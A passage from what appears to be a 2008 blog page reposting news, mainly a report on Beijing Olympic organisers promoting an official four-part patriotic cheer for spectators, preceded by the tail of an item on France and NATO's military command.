But Mr Sarkozy indicated earlier this year that France may return to the organisation’s military command.

The proposed new military strategy will be discussed in parliament later this month.

 

June 17, 2008

Beijing approves Olympics ‘cheer’

Posted by Social Geek under Welcome | Tags: , , , , , , , , , , , , , , , |
Leave a Comment 
 

Beijing Olympic chiefs are introducing an official cheer for patriotic spectators to spur on Team China at the Games, Chinese media reports.

The authoritative, four-part Olympic cheer, accompanied by detailed instructions, will be promoted on TV, in schools and with a poster campaign.

It involves clapping twice, giving the thumbs-up, clapping twice more and then punching the air with both arms.

The cheer is accompanied by chants of “Olympics”, “Let’s go” and “China”.

The Beijing Olympic Organising Committee has hired 30 cheering squads who will show spectators how it is done at Games stadia, reports Xinhua state media.

‘Civilized cheering’

A committee official said the simple chants and gestures were designed to help spectators cheer for their favourite athletes in a smooth, civilized manner.

The Ministry of Education is also arranging special training sessions in schools for the 800,000 students who are expected to attend the Games.

Li Ning, president of the Beijing Etiquette Institute, told the Beijing News that the cheer was in line with general international principles for cheering, while at the same time possessing characteristics of Chinese culture.

 

Next Page »